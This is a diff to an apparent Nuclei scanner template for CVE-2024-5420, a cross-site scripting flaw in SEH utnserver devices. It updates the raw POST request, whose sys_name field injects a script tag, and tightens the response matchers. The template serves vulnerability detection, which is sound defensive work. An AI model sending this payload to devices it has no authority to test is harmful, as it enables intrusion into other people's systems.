updated matchers

http/cves/2024/CVE-2024-5420.yaml

@@ -1,7 +1,7 @@
 id: CVE-2024-5420
 
 info:
-  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - XSS 
+  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - Cross-Site Scripting
   author: bl4ckp4r4d1s3
   severity: high
   description: |
@@ -9,6 +9,7 @@ info:
   reference:
     - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
     - https://seclists.org/fulldisclosure/2024/Jun/4
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-5420
   classification:
     cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
     cvss-score: 8.3
@@ -20,26 +21,31 @@ info:
     shodan-query: SEH HTTP Server
     vendor: SEH Computertechnik
     product: utnserver Pro/ProMAX / INU-100
-    version: 0 - 20.1.22
-  tags: cve,cve2024,utnserver,xss
+  tags: cve,cve2024,utnserver,seh,xss
 
 http:
-  - method: POST
-    path: 
-      - "{{BaseURL}}/device/description_en.html"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28%221337%22%29%3C%2Fscript%3E&sys_descr=&sys_contact=
-        
+  - raw:
+      - |
+        POST /device/description_en.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=
+
+    matchers-condition: and
     matchers:
       - type: word
-        name: XSS
-        words:
-          - '<input name="sys_name" value="“><script>alert("1337")</script>" id="standort" type="text"/>'
         part: body
-        
+        words:
+          - 'value="“><script>alert(document.domain)</script>" id="standort"'
+          - 'Host name</label>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-